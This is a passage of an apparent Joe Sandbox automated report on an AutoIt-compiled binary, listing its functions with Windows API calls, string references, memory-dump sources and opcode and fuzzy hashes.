Part of subcall function 00D5F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00D8AEA5,?,?,00000000,00000008), ref: 00D5F2A6

gethostbyname.WS2_32(?), ref: 00D992F0
WSAGetLastError.WS2_32(00000000), ref: 00D992FB
_memmove.LIBCMT ref: 00D99328
inet_ntoa.WS2_32(?), ref: 00D99333

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: aaaaf9a976b513d4e77468f817c51f4824322c4138757faa3b8dcff9132671ee
Instruction ID: d4c385f98c01d94230e1b1298cbce92d473e57bacfcfb72fa41ff9bd571dfd6f
Opcode Fuzzy Hash: aaaaf9a976b513d4e77468f817c51f4824322c4138757faa3b8dcff9132671ee
Instruction Fuzzy Hash: 77112B7660010AAFCF04FBA4CD56CAEB7BAEF04311B144065F506E72A2DB30AE04DBB1

Function 00D6010A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00D645EC: __FF_MSGBANNER.LIBCMT ref: 00D64603
Part of subcall function 00D645EC: __NMSG_WRITE.LIBCMT ref: 00D6460A
Part of subcall function 00D645EC: RtlAllocateHeap.NTDLL(01140000,00000000,00000001), ref: 00D6462F

std::exception::exception.LIBCMT ref: 00D6013E
__CxxThrowException@8.LIBCMT ref: 00D60153

Part of subcall function 00D67495: RaiseException.KERNEL32(?,?,00D4125D,00DF6598,?,?,?,00D60158,00D4125D,00DF6598,?,00000001), ref: 00D674E6

Strings

bad allocation, xrefs: 00D60137

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: bad allocation
API String ID: 3902256705-2104205924
Opcode ID: be2c18c12ee87638c9d66965772f4ca4db1e15e08faba4ba0a2ead27971e1831
Instruction ID: f0aa4543f1c316162de57479fe8a0868e968bd45fad2ac3ea3636b8a79084cda
Opcode Fuzzy Hash: be2c18c12ee87638c9d66965772f4ca4db1e15e08faba4ba0a2ead27971e1831
Instruction Fuzzy Hash: C1F0A43510420EA7C715AFA8DC02AEF7BE9DF15354F14042AF905D6281DBB0D68196B5

Function 00D9F79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723ceee08c059b29eefdb18c530fc5e1706ef1aacf190988c1f855d77cdc8fd5
Instruction ID: 7e510a184acd607703aede71c1fcb9368c702d0c033c86a27ff6cee4dd2ef3e7
Opcode Fuzzy Hash: 723ceee08c059b29eefdb18c530fc5e1706ef1aacf190988c1f855d77cdc8fd5
Instruction Fuzzy Hash: 66F16A716087019FCB10DF24C980B5AB7E5FF88314F14892EF999DB292DB71E945CBA2

Function 00D4C610 Relevance: 4.6, APIs: 3, Instructions: 125COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00D4C00E,?,?,?,?,00000010), ref: 00D4C627
MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00D4C65F
_memmove.LIBCMT ref: 00D4C697

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: 4de78510790c22e874f7b01d6d675558e550d8579f28198dde9f69aaabbe8c51
Instruction ID: 6120eb2c910d57497eb79cc07bc0594e2bd3b1cf18443036821756e7376a956e
Opcode Fuzzy Hash: 4de78510790c22e874f7b01d6d675558e550d8579f28198dde9f69aaabbe8c51
Instruction Fuzzy Hash: 13310BB22013016BD7649B34DC46B6BB7D9EF54310F159539F85AC72A0EA31E9108B71

Function 00D43A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(00D43C31), ref: 00D43A7D
SHGetPathFromIDListW.SHELL32(?,?), ref: 00D43AD2
SHGetDesktopFolder.SHELL32(?), ref: 00D43A8F

Part of subcall function 00D43B1E: _wcsncpy.LIBCMT ref: 00D43B32

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: DesktopFolderFromListMallocPath_wcsncpy
String ID:
API String ID: 3981382179-0
Opcode ID: c1da91be2c4bffaeca0fc258d493267c01a94c4f90db029725d68d19258feca9
Instruction ID: 8c8c9d11bb6cb63b3c339026b995c3ef04032d49e428f360fe0d2e9d085a558b
Opcode Fuzzy Hash: c1da91be2c4bffaeca0fc258d493267c01a94c4f90db029725d68d19258feca9
Instruction Fuzzy Hash: 13215376B00114ABCB14DF99DC84EEE77BDEF88740B1440A4F50AD7251DB309E46CBA0

Function 00D645EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00D64603

Part of subcall function 00D68E52: __NMSG_WRITE.LIBCMT ref: 00D68E79
Part of subcall function 00D68E52: __NMSG_WRITE.LIBCMT ref: 00D68E83

__NMSG_WRITE.LIBCMT ref: 00D6460A

Part of subcall function 00D68EB2: GetModuleFileNameW.KERNEL32(00000000,00E00312,00000104,?,00000001,00D60127), ref: 00D68F44
Part of subcall function 00D68EB2: ___crtMessageBoxW.LIBCMT ref: 00D68FF2

Part of subcall function 00D61D65: ___crtCorExitProcess.LIBCMT ref: 00D61D6B
Part of subcall function 00D61D65: ExitProcess.KERNEL32 ref: 00D61D74

Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E

RtlAllocateHeap.NTDLL(01140000,00000000,00000001), ref: 00D6462F

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 8d497e4a018643efd35eab2309b49f1d7f5a2939db93b8ce4cedbb4cc865956d
Instruction ID: c365cc00f3957a0d3809afea1eb065c4296f052f54f7161f9bdf24cea5cb6fe2
Opcode Fuzzy Hash: 8d497e4a018643efd35eab2309b49f1d7f5a2939db93b8ce4cedbb4cc865956d
Instruction Fuzzy Hash: 2201F531641301AFEA203BA8EC02BAA3748EFC2761F550125F501AB1C2DFB19C408671

Function 00D4E60E Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00D4E646
DispatchMessageW.USER32(?), ref: 00D4E651
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D4E664

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: ebcc5dfff2e41d1a6ed0e38f11b1cf4634eae6849a67e501eb621ad49e2d89fa
Instruction ID: 456a5df040a5334ba6aa6ab396a899a6cdd1f4ea364bcd60116c115c0326b587
Opcode Fuzzy Hash: ebcc5dfff2e41d1a6ed0e38f11b1cf4634eae6849a67e501eb621ad49e2d89fa
Instruction Fuzzy Hash: B5F0F87264434AABEB14EBE08C45FABB39DBF94740F084C39BA41D6180EAA4E5448732

Function 00D5058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON

Download Yara Rule

Strings

CALL, xrefs: 00D510DB

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: bd8335bb8400a47981f61c676d6499d7ab47584d64e21687aae2810de2b50419
Instruction ID: ac26d8a9c0fe6d7dda6b47349f2aa4188c68a6e5ad234e39ce2169134ec42a55
Opcode Fuzzy Hash: bd8335bb8400a47981f61c676d6499d7ab47584d64e21687aae2810de2b50419
Instruction Fuzzy Hash: 9D226C74508341CFDB24DF18C490A6ABBE1FF89305F18895DED9A8B261D771E889CF62

Function 00D4131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00D416F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00D41751

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D4159B
CoInitialize.OLE32(00000000), ref: 00D41612
CloseHandle.KERNEL32(00000000), ref: 00DB58F7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Handle$ClipboardCloseFormatInitializeRegister
String ID:
API String ID: 458326420-0
Opcode ID: 250e65573e3d6083f7b36dbd9857b7ad03a94d122c1f649cbe62fc290a6e6e83
Instruction ID: d514e8e4c7d2e95436cef9800ebfd62cd3e95611bfcae41b02c48ad1cc33575f
Opcode Fuzzy Hash: 250e65573e3d6083f7b36dbd9857b7ad03a94d122c1f649cbe62fc290a6e6e83
Instruction Fuzzy Hash: 1571AAB89013418FC710DF6BAD91554BBA5F79934479851AEE02ABF3B2DB3244C8CF21

Function 00D44010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D4405A

Strings

EA06, xrefs: 00DB57B9

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 4263a23bc91a0fba6092ba4e7f8233e48263341b1781ec0a86fa3e511cd1d61d
Instruction ID: 0401bdea916ee5229a1fbc172b5657ba5033b7dac66388e05dd37a500c7a1ca9
Opcode Fuzzy Hash: 4263a23bc91a0fba6092ba4e7f8233e48263341b1781ec0a86fa3e511cd1d61d
Instruction Fuzzy Hash: 2B418D61A043589BDF159B648DA17BF7FA2DF15300F2C4465EAC2EB283CA21CDD487B1

Function 00D9013F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 00D901A9

Strings

0.0.0.0, xrefs: 00D901B7

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscmp
String ID: 0.0.0.0
API String ID: 856254489-3771769585
Opcode ID: 75b65b1c4584aef73b6176872268751e0dec535e2d30c6bbbf57af24e377c5ee
Instruction ID: bd371162a4db48fcb552d8c1975b8fa5e99d8944f409ab0e9760015d57917c5e
Opcode Fuzzy Hash: 75b65b1c4584aef73b6176872268751e0dec535e2d30c6bbbf57af24e377c5ee
Instruction Fuzzy Hash: 5811A335600304DFCF14EB58D992E69B7A6AF88714F148059F549AF391DA70ED819BB0

Function 00D43BFF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DB3CF1

Part of subcall function 00D431B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D431DA

Part of subcall function 00D43A67: SHGetMalloc.SHELL32(00D43C31), ref: 00D43A7D
Part of subcall function 00D43A67: SHGetDesktopFolder.SHELL32(?), ref: 00D43A8F
Part of subcall function 00D43A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00D43AD2

Part of subcall function 00D43B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00E022E8,?), ref: 00D43B65

Strings

X, xrefs: 00DB3D01

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Path$FullName$DesktopFolderFromListMalloc_memset
String ID: X
API String ID: 2727075218-3081909835
Opcode ID: bc42d10e384b0d042cd133bce990ac76fb51f38fa2fff50f2144b9f59b830024
Instruction ID: 8d89d76fd1db975eec31bdeb7066d77a2cd28d96bd0180aaec164bbb7f20ffc1
Opcode Fuzzy Hash: bc42d10e384b0d042cd133bce990ac76fb51f38fa2fff50f2144b9f59b830024
Instruction Fuzzy Hash: 7D11C6B1A00298ABCF05DFD8D8456EEBBF9EF45704F04800AE541BB341CBB54A498FB1

Function 00D830AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D830E7

Strings

", xrefs: 00D830B0

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: "
API String ID: 4104443479-357034475
Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
Instruction ID: bf4cff488a45ecda3cd3080acc7ca6d5b6aced7b16cab1eae1c3cf94c1ffd36a
Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
Instruction Fuzzy Hash: DC01F432200225ABCB24DF2DC8919AB77A9FFC5714714802EF90ACB245D631E902C7F0

Function 00D434C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00DB34AA

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: LibraryLoad
String ID: >>>AUTOIT NO CMDEXECUTE<<<
API String ID: 1029625771-2684727018
Opcode ID: 87e19ebdd2be4202ca466302de7d4a78f599f17adcfe4b34bf80344cddf91455
Instruction ID: 7eda4e4fb450d2738822a3957f968f1f86fdda538e9d6b0b24f3bf2e06132b5a
Opcode Fuzzy Hash: 87e19ebdd2be4202ca466302de7d4a78f599f17adcfe4b34bf80344cddf91455
Instruction Fuzzy Hash: 08F0FF75905209AF8F15EFA8D8919FFB778EE10310B548526B86692182EB349B09DB31

Function 00D86852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D86623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00D8685E,?,?,?,00DB4A5C,00DDE448,00000003,?,?), ref: 00D866E2

WriteFile.KERNEL32(?,?,",00000000,00000000,?,?,?,00DB4A5C,00DDE448,00000003,?,?,00D44C44,?,?), ref: 00D8686C

Strings

", xrefs: 00D86864

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: File$PointerWrite
String ID: "
API String ID: 539440098-357034475
Opcode ID: 41ae64d895a81a6737863d4e7b9c6a495ec95e1814ecf208b4d0c80d761034cd
Instruction ID: 2cd82e6eea19a544a69f5394d512b0d64943f4f655bedff413f039daa15034c8
Opcode Fuzzy Hash: 41ae64d895a81a6737863d4e7b9c6a495ec95e1814ecf208b4d0c80d761034cd
Instruction Fuzzy Hash: 7AE04636400308BBDB20AF94DC01E8ABBBDEB04320F00051AF94191110D7B1EA149BA0

Function 00D5F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

